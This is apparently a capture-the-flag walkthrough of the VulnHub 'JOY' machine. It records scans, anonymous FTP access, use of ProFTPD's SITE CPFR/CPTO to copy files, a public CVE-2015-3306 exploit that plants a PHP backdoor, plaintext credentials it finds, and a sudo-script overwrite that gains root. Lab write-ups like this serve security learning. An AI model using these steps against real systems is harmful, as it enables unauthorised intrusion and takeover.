nmap
nmap -p21,22,25,80,110,139,143,445,465,587,993,995 10.0.2.54 -sC -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-19 02:53 EDT
Nmap scan report for 10.0.2.54 (10.0.2.54)
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE STLS CAPA TOP UIDL RESP-CODES PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: have more LOGIN-REFERRALS IMAP4rev1 ID OK capabilities SASL-IR LITERAL+ STARTTLS Pre-login post-login LOGINDISABLEDA0001 listed IDLE ENABLE
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvi
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvi
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:A8:98:92 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: The, JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_
Host script results:
|_clock-skew: mean: -2h40m03s, deviation: 4h37m06s, median: -4s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknow
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2021-04-19T14:53:47+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-04-19T06:53:47
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org
Nmap done: 1 IP address (1 host up) scanned in 42.45 seconds
Enumeration
FTP
ftp 10.0.2.54
Connected to 10.0.2.54.
220 The Good Tech Inc. FTP Server
Name (10.0.2.54:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> cd dowload
550 dowload: No such file or directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> cd download
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 2514 Apr 19 06:57 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
226 Transfer complete
ftp> cd reminder
550 reminder: No such file or directory
ftp> get reminder
local: reminder remote: reminder
200 PORT command successful
150 Opening BINARY mode data connection for reminder (24 bytes)
226 Transfer complete
24 bytes received in 0.00 secs (49.3421 kB/s)
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp>
strings reminder
Lock down this machine!
Tried LFI but no result
wfuzz -c -w /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt --hc 404 --hh 206 --hw 169 10.0.2.54/ossec/index.php?f==FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.2.54/ossec/index.php?f==FUZZ
Total requests: 9514
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 9514
Filtered Requests: 9514
Requests/sec.: 0
GoBuster
gobuster dir -u http://10.0.2.54/ossec -w /usr/share/dirb/wordlists/big.txt -s 200,301,302 -x html,txt,php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.2.54/ossec
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
2021/04/19 03:49:44 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 274]
/.htpasswd (Status: 403) [Size: 274]
/.htaccess.html (Status: 403) [Size: 274]
/.htpasswd.html (Status: 403) [Size: 274]
/.htpasswd.txt (Status: 403) [Size: 274]
/.htaccess.txt (Status: 403) [Size: 274]
/.htpasswd.php (Status: 403) [Size: 274]
/.htaccess.php (Status: 403) [Size: 274]
/LICENSE (Status: 200) [Size: 35745]
/README (Status: 200) [Size: 2106]
/css (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/css/]
/img (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/img/]
/index.php (Status: 200) [Size: 27180]
/js (Status: 301) [Size: 309] [--> http://10.0.2.54/ossec/js/]
/lib (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/lib/]
/site (Status: 301) [Size: 311] [--> http://10.0.2.54/ossec/site/]
/tmp (Status: 301) [Size: 310] [--> http://10.0.2.54/ossec/tmp/]
===============================================================
2021/04/19 03:50:02 Finished
===============================================================
smbmap -H 10.0.2.54 --depth 5
[+] Guest session IP: 10.0.2.54:445 Name: 10.0.2.54
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.5.16-Debian)
SNMP Enumeration
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# strings directory
Patrick s Directory
total 184
drwxr-xr-x 18 patrick patrick 4096 Apr 19 16:15 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:40 3FJlDls4dEtazQ0xfGRlahL373aTKA79hxCzFSmBctdm8Pv0MwW1CcVtH3STkbao.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 14:45 4RgCb2HSSwvKyDS6d7Nbd8N16ZN1m76AvP3Dx8bEStOoNrf41t6RmSsYDWmIXGzz.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:30 aXqprGjKEDw7YhU7qmL2o5q7L1IIBO6apF6tCp1DNTD7uLYIfIht4GHWHDS3qOhD.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 14:50 b3hVEDYhrLvmVokhImQzRafdp4XFQO9C9H0LceEBKcYEAzvWHwlVHcQXyxNY4Exh.txt
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:55 cDzTVwEE7ItjX58Yrp6ciXB0yNws8TV8SatOva6Ubna4IWoxJ886fgWv99CECFxh.txt
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 0 Apr 19 14:50 eajl17pspHujxN7BHLJfUexffGdKWpdC.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:15 EqOhZV9qOwKCAewEt1sNk3VeCJS3UpoJ.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:10 fkktiV49S47Qlzq7e4EOTjDMoh2T8ZST0mupFK9ksrsDx2G7UoyPh95VNnCFdSSj.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 14:40 fvf7EfkpUrtvLhIkDeXoqRyFJwSxvZMe.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:05 gp1mD5FuNzfD1x0nzQqjq4xgBMvDGy5l.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:45 gw345J06tj91I0Yn5KvQSF6YQ5rKL42t.txt
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:20 hkuifdXx4Bi1CWSuVBMSn3jEmv9xMyzHqU97roEYlofa2cvcyzYmXJgoBpNWySTH.txt
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
-rw-r--r-- 1 patrick patrick 24 Apr 19 16:15 iEbwg74wdFTd4aBQAt0nQjZpiylcaBhOPwcVp8WU2W2o9KNmMpHZa1qoeyr84Kif.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 16:00 ix28zdyJiIueIJNTfpGTmLt7Cv718f2S.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:40 j7Ql0lCfFrXyN2ItNQoWOwHHYxzbXEaR.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 16:10 KP3pHMZx27IhHmTwXh61Bv1l12J3mQzG.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:25 KVCmIi3bNPzyziDF27vbFeHEGJTitGjW.txt
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:25 ltQgU8xJNc2sHmON7pxIUkRIQtYzFFsqjaAyFkVqyEur1HaT5hjjhErzq7sXNu4h.txt
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:50 mTbIkSA8KMBSQ5E8BNnpF4je9X7abosG.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:55 MThnzqLhRTqmfETsC2dEYNyvns0TpxGn.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:10 NHj9Q1tGF68hFCJ2d6uQDDrXTSA2ZzK2.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:00 NJd9OMvEboHZBMfUdbvVi1fstiW5eaRT.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 16:15 NxdDRCNOwGi0s8zoBYEsFSGjMIehbsuw.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 0 Apr 19 14:55 Q1aNW83ipJ3rfjfifXWDONZZMNFb9B7c.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 14:40 qdTRNfBg1Avs4grdfgH9k3ILEQuQKvfw33UgeAqJVukIDstGqtxPqGHholOEGqUh.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 14:55 Qki6kcARVQ0tMqgtetT0dqMGaMVZIPWgrNll6KF2uHdCBH8D9jjr2z0t31XtFGDw.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 16:10 RMbphjXFYRRaEctLBR7OfVu0WFJowLKfjgH4xAafOKTVvUBIzzTyTQi8JiqFQ7nf.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:20 Rsdu3Ak75tD6z4s3cEIlfoSAIdOVDY1c.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:05 rwLDEU3aoJtHEL9bmRdM15UIJo2sGMa2hnir5EKX9TLV9NuHGZBdB2kGMKmrGN2J.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:35 S2CIIYvoZLOgYsj9S8VFkKChW38KvzmLa4c6kdHi1zotZTeXoh9Ozcdmrpp4mseG.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 16:00 s7CrzyWgjECN4lyEB2GxsDkSJhZJ0NYHERjRfzekyVTFK5XxmUT2zEJwvDIxYOH1.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:50 TZzQM0akBNDCfyz1tk7JXSYx45P69pxaMn4jr0LjeX2ygFzqZVK7v23gJRK6rC6M.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 14:45 uw8HQthse2QdxWV9xUlUJ6g8sPaPzmqS.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 24 Apr 19 16:05 VmNhOT6FwtyghSRHkDLBkR6kBIR785IXaJYoBi2ZNyjJReIc07P5JcNSS4QwgmZg.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:35 vmybSjbBrxlEA2Nf42dybZX5sbBKooW3.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:45 wk0OlzAcE7m2KIJfp2SoTLPAV1mV8PNMQJzDfERhPV5TQLXOBjyCKK0gxjZuMMrt.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 16:05 WWUWEBStcDwf5PEs4Eo7HG6zevsICKmO.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:15 yFg90qrnGSZtsrk3KtEaiF8BTtciD9f1kbD7twDPeZct6J7bObZWUfzZOoYrfNJl.txt
-rw-r--r-- 1 patrick patrick 24 Apr 19 15:00 YwKHyGrh5a1eV4BnS9iNKvatFz1mzzjFvBap2MQerKBK12tBMSmrGFlyFoy5M7B7.txt
-rw-r--r-- 1 patrick patrick 0 Apr 19 15:30 Zw2UgL4EdNERhzfXbluskOui97fKExWw.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
One thing to notice here is that we have read/write permission in /upload directory
. So maybe we can use cpfr & cpto
command to get the files from the patrick’s home directory to there and then find some information.
To do so connect to FTP using telnet i.e telnet IP 21 and use the following
site cpfr /path-of-file/folder-to-copy
site cpto /path-where-to-copy
$ tftp 10.0.2.54 36969
tftp> get version_control
Received 419 bytes in 0.0 seconds
tftp> quit
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
patrick:apollo098765
Exploitation
┌──(root💀nucleus)-[~/vulnhub/joy]
└─ python exploit.py --host 10.0.2.54 --port 21 --path "/var/www/tryingharderisjoy"
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 10.0.2.54:21
[+] Target exploited, acessing shell at http://10.0.2.54/backdoor.php
[+] Running whoami: www-data
[+] Done
https://www.exploit-db.com/exploits/36803
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls
ls
CONTRIB README.search img lib setup.sh
LICENSE css index.php ossec_conf.php site
README htaccess_def.txt js patricksecretsofjoy tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cd patricksecretsofjoy
cd patricksecretsofjoy
bash: cd: patricksecretsofjoy: Not a directory
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
find the creds
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# echo "/bin/bash" > test
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# ftp 10.0.2.54
Connected to 10.0.2.54.
220 The Good Tech Inc. FTP Server
Name (10.0.2.54:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Apr 19 07:57 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 16421 Apr 20 07:48 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
-rw-r--r-- 1 ftp ftp 3459 Apr 19 07:57 shell.php
226 Transfer complete
ftp> put test
local: test remote: test
200 PORT command successful
150 Opening BINARY mode data connection for test
226 Transfer complete
10 bytes sent in 0.00 secs (171.3268 kB/s)
ftp> exit
221 Goodbye.
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# telnet 10.0.2.54
Trying 10.0.2.54...
telnet: Unable to connect to remote host: Connection refused
┌──(root💀nucleus)-[~/vulnhub/joy]
└─# telnet 10.0.2.54 21
Trying 10.0.2.54...
Connected to 10.0.2.54.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/ftp/upload/test
350 File or directory exists, ready for destination name
cpto /home/patrick/script/test
500 CPTO not understood
site cpto /home/patrick/script/test
250 Copy successful
Privilage Esclation
created test and using a site cpto
and site cpfr
copied the test file to /home/
patrick/script/test
with sudo test gave us root
patrick@JOY:/var/www/tryingharderisjoy$ sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
patrick@JOY:/var/www/tryingharderisjoy$ sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../.What permissions would you like to set the file to?
/^H^H/etc/passwd
Currently changing file permissions, please wait.
chmod: invalid mode: ‘../.././\b\b/etc/passwd’
Try 'chmod --help' for more information.
Tidying up...
7777Done!
patrick@JOY:/var/www/tryingharderisjoy$ ls -al /etc/passwd
-rwxrwxrwx 1 root root 2612 Apr 20 14:21 /etc/passwd
patrick@JOY:/var/www/tryingharderisjoy$
patrick@JOY:/$ sudo /home/patrick/script/test
root@JOY:/#
lol
root@JOY:~# cat proof.txt
Never grant sudo permissions on scripts that perform system functions!